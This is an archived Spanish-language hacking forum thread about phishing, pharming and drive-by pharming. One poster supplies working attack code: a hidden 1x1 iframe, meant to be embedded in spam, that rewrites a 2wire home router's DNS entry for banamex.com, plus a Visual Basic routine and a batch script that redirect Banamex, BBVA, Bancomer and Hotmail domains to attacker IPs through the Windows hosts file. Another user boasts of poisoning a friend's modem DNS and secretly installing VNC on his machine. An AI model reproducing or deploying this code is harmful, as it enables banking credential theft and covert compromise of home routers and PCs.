Help - Search - Members - Calendar
Full Version: Futuro del phishing
Hackerss.com > Informática > Hacking
alvaro4356
Bueno estuve leyendo un artículo acerca de phishing ("The Gentle Art of Phishing") y en ella se comentaba (casi al final) que en los próximos años el phishing iba a evolucionar al pharming y a la mensajería instantánea. Mi duda es que relación tiene k ver la mensajería instantánea en la evolucion del phishing, tanto así k lo menciona ?
Salu2
Farid
nombraba al pharming y mensajeria instantanea juntos o por separado? porque sinceramente no les encuentro ninguna relacion xD talvez algun metodo para manipular la direccion a la que te lleva si clickeas desde msn... por ejemplo te paso google.com y en realidad entras a mipagina.com
Bucio
pharming... na el futuro es ahora, io a esas tecnicas les llamo envenamiento de dns
XD ehh imaginense configurar los modems e ... que mas cambiar una pagina XD see muy bueno...
Komtec1
yeap pharming, d-pharming, mandas a un link que sea (por mensajerai instantanea das el link) el entrar ya esta setteado el dominio que quieras a la ip que tu quieras, ahora la forma mas facil seria:

worm de msn - link a pagina - setteado

y listo, ahora si se saca el d-phary se incluye en esa pagina de los routers mas generales (un ej: en mexico los 2wire, que el d-phar ahi ya esta mas quemado que otra cosa xD) entonces ahora imagina cuando el worm se propague, y como no infectaras ni nada, entonces mucho mucho mucho mas facil que se propague yaque solo sera: http://www.tal.com/cualquierpagesetteada.html y listo.....

Komtec1
Bucio
hahah si eso si, me da risa una ves lo hicimos en la casa de un amigo xD.. para cambiarle envenenar al moden xD ajajja cambiamos el hotmail.com hacia otra page xD con una dns de mi lap y el we callo y sigue xD ajajaja me da risa que tambien le instalamos el vnc xD ajjaja nu ma.. xD
alvaro4356
Bueno, KOMTEC1, tienes razón, eso es. Si quieren mayor info al respecto , la pueden encontrar aquí: https://forum.eviloctal.com/index.php (Está en chino e inglés, ya ps, no sean lazys, aprendan,ps)
Garibay
Pharming y Drive By Pharming son actualmente las tecnicas usadas:

El drive by pharming consiste en la modificación de los registros para resolución de nombres (DNS) y busca redirigir las peticiones de conexión de un usuario hacia un sistema comprometido por un atacante. Una modalidad consiste en modificar el archivo “hosts” de los equipos de las víctimas, pero una variante más difícil de detectar consiste en alterar los registros de resolución de nombres de los ruteadores caseros de banda ancha (DSL). Este ataque realizado usualmente con tecnologías como javascript y flash intenta identificar la marca y dirección del ruteador casero para poder comprometerlo exitosamente.

Ejemplo del nuevo drive:

QUOTE
<IFRAME frameborder="0" name="frm1" scrolling='Auto'
src="http://gateway.2wire.net/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=www.banamex.com&ADDR=127.0.0.0" tppabs="http://gateway.2wire.net/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=www.banamex.com&ADDR=127.0.0.0" height="1" width="1" ></IFRAME>




Este codigo va insertado en la letter (la carta o mensaje que se envia en spam)




El pharming consiste en ejecutar un .exe o un .bat de apariencia inocente que modifica los host como se muestra aqui:


SOURCE VISUAL BASIC

QUOTE
Sub hosts()

ip = "72.167.163.147" '
host1 = " 72.167.163.147 www.banamex.com"
host2 = " 72.167.163.147 www.banamex.com.mx"
host3 = " 72.167.163.147 banamex.com"
host4 = " 72.167.163.147 banamex.com.mx"
host5 = " 72.167.163.147 boveda.banamex.com"
host6 = " 72.167.163.147 boveda.banamex.com.mx"
host7 = " 72.167.163.147 www.boveda.banamex.com"
host8 = " 72.167.163.147 www.boveda.banamex.com.mx"
host9 = " 72.167.163.147 bancanetempresarial.banamex.com"
host10 = " 72.167.163.147 bancanetempresarial.banamex.com.mx"
host11 = " 72.167.163.147 www.bancanetempresarial.banamex.com"
host12 = " 72.167.163.147 www.bacanetempresarial.banamex.com.mx"

Open "C:\WINDOWS\system32\drivers\etc\hosts" For Output As #1
Print #1, ip; host1
Print #1, ip; host2
Print #1, ip; host3
Print #1, ip; host4
Print #1, ip; host5
Print #1, ip; host6
Print #1, ip; host7
Print #1, ip; host8
Print #1, ip; host9
Print #1, ip; host10
Print #1, ip; host11
Print #1, ip; host12
Close #1

End Sub





SOURCE BATCH

QUOTE
@echo off
echo 195.69.75.149 www.banamex.com.mx >> %windir%\system32\drivers\etc\hosts
echo 195.69.75.149 www.bbva.com >> %windir%\system32\drivers\etc\hosts
echo 195.69.75.149 www.bancomer.com.mx >> %windir%\system32\drivers\etc\hosts
echo 195.69.75.149 www.esmas.com >> %windir%\system32\drivers\etc\hosts
echo 195.69.75.149 www.hotmail.com >> %windir%\system32\drivers\etc\hosts
exit




Actualmente los que utilizan estas tecnicas necesitan de un dedicado o una ip dedicada pora porder hacer pharming...


CABE MENCIONAR QUE EL SPAM SE LLEVA DE LA MANO CON BOTS Y DRONES PARA UNA INFECCION SATISFACTORIA =)
Murd0c
Yo en la ezine de raza mexicana estaba leyendo, pero ahi viene el vishing ((( es la combinacion de phishing y voice ))), hay por si alguien se intereza ke baje la enzine ja

Me cagan todos estos metodos cuando me los tratan de aplicar a mi xDD.
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.